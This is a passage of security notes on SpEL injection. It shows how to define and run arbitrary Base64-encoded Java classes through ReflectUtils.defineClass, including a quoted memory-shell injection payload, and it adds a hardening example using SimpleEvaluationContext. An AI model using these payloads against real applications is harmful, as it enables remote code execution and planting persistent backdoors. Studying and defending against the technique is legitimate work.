Notes on some ways expression languages (EL) can be used to load bytecode

SpEL

The class org.springframework.cglib.core.ReflectUtils has its own defineClass implementation, and it is public, so it can be called directly from a SpEL type reference:

```java
// classname: fully qualified name of the class to define
// code: Base64-encoded class bytes
String spel = "T(org.springframework.cglib.core.ReflectUtils).defineClass(\"" + classname + "\"," +
        "T(org.springframework.util.Base64Utils).decodeFromString(" +
        "\"" +
        code + "\")," +
        "T(java.lang.Thread).currentThread().getContextClassLoader()" +
        ").newInstance()";
```

That is all it takes.

The ClassLoader I obtain here is T(java.lang.Thread).currentThread().getContextClassLoader()

There are other options depending on the environment, for example T(org.springframework.util.ClassUtils).getDefaultClassLoader()
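Everything in the expression above hinges on the T() operator: it is what lets the expression reach ReflectUtils, Base64Utils and Thread in the first place. The following is an added example (not code from the original post) showing the configuration that makes this reachable beside the one that shuts it off. It assumes Spring Expression 5.x on the classpath; the class and method names are my own, and the expression used is a harmless stand-in that still requires a type reference, exactly as the payload does.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

/**
 * Added example (not from the original post). Shows why the T() operator matters for
 * the defineClass trick and how SimpleEvaluationContext removes it.
 * Assumes Spring Expression 5.x on the classpath.
 */
public class SpelTypeReferenceDemo {

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Harmless expression that still needs a TypeLocator, just like the
    // T(org.springframework.cglib.core.ReflectUtils) reference in the payload.
    static final String TYPE_REF_EXPR = "T(java.lang.Math).max(3, 7)";

    /**
     * Exposed configuration: StandardEvaluationContext ships with a TypeLocator that
     * resolves any T(...) reference against the application class loader, so anything
     * public and reachable (ReflectUtils.defineClass included) is callable.
     */
    static Object evaluateWithStandardContext(String expr) {
        EvaluationContext ctx = new StandardEvaluationContext();
        return PARSER.parseExpression(expr).getValue(ctx);
    }

    /**
     * Hardened configuration: SimpleEvaluationContext installs a TypeLocator that refuses
     * every type reference, so T(...) fails before any class is even located, let alone
     * defined. Returns true when the expression was rejected.
     */
    static boolean rejectedBySimpleContext(String expr) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        try {
            PARSER.parseExpression(expr).getValue(ctx);
            return false;
        } catch (SpelEvaluationException e) {
            // SpEL reports TYPE_NOT_FOUND for any T() under SimpleEvaluationContext.
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println("Standard context result: " + evaluateWithStandardContext(TYPE_REF_EXPR));
        System.out.println("Simple context rejected T(): " + rejectedBySimpleContext(TYPE_REF_EXPR));
    }
}
```

The practical takeaway for anyone evaluating expressions that contain user input: a SimpleEvaluationContext (data binding only, no type references, no constructors, no bean references) defeats every variant of the payload on this page regardless of which ClassLoader expression is chosen, whereas a blocklist on strings such as "ReflectUtils" only covers the variants someone has already thought of.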

Reference: https://forum.butian.net/share/1385

A highly reusable payload, although this payload seems to have some problems:

```
#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}
```

I don't know whether there are other usable defineClass methods; I suspect there are.

OGNL